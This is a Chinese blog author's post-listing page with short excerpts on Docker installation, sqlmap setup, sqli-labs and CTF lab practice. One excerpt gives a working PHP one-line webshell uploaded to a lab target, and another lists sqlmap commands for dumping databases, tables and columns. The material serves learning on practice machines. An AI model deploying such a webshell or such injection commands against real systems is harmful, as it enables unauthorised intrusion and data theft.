工具学习
0hma
这个作者很懒,什么都没留下…
展开
-
CentOS7下安装Docker容器+镜像加速器+Docker-Compose
DockerDocker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。Docker的安装安装命令如下:curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun也可以使用国内 daocloud 一键安装命令:curl -sSL https://get.dao原创 2020-10-16 23:44:07 · 172 阅读 · 0 评论 -
Web安全-用一句话木马拿下RDCTF靶机实战1
一句话木马一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。本次使用的php一句话:<?php @eval($_POST['1']) ?>用这段代码保存为一个php后门木马上传木马本次使用的是RDCTF平台的靶机实战进入管理员后台界面找到附件管理,发现了这里可以上传文件将写好的一句话木马上传回到首页,找到文件上传的网页找到一句话木马文件使用蚁剑连接拿到flag...原创 2020-09-15 18:28:21 · 617 阅读 · 0 评论 -
SQL注入学习-搭建sqli-labs
sqli-labssqli-labs是一个非常好的学习sql注入的平台。0X01 sqli-labs下载sqli-labs下载地址:https://github.com/Audi-1/sqli-labs0X02 sqli-labs安装安装一个集成环境,本次使用宝塔面板的WAMP环境先添加一个站点注意要新建一个MySQL数据库创建一个数据库上传sqli-labs压缩包到根目录解压得到文件夹修改www\sqli-labs-master\sql-connections,这个目录下的原创 2020-09-12 00:31:48 · 1018 阅读 · 2 评论 -
SQL注入学习-sqlmap的安装
sqlmap的安装sqlmap 官网:http://sqlmap.org/sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usagesqlmap用户手册详解实用版:http://www.vuln.cn/20351.获取sqlmap压缩包2.在python文件夹中新建一个sqlmap文件夹,将压缩包解压后将其添加进入环境变量3.打开命令行窗口输入sqlmap.py运行...原创 2020-09-11 22:59:20 · 68 阅读 · 0 评论 -
SQL注入学习-RDCTF靶机实战1
sqlmap的安装1.获取sqlmap压缩包2.解压后将其添加进入环境变量3.打开命令行窗口输入sqlmap.py运行sqlmap的使用本次使用的命令sqlmap.py -u {URL} //查看是否有注入点sqlmap.py -u {URL} -dbs //爆数据库sqlmap.py -u {URL} -D db --tables //爆数据表sqlmap.py -u {URL} -D db -T table --columns //爆字段sqlmap.py -u {URL} -D原创 2020-09-10 18:26:48 · 317 阅读 · 0 评论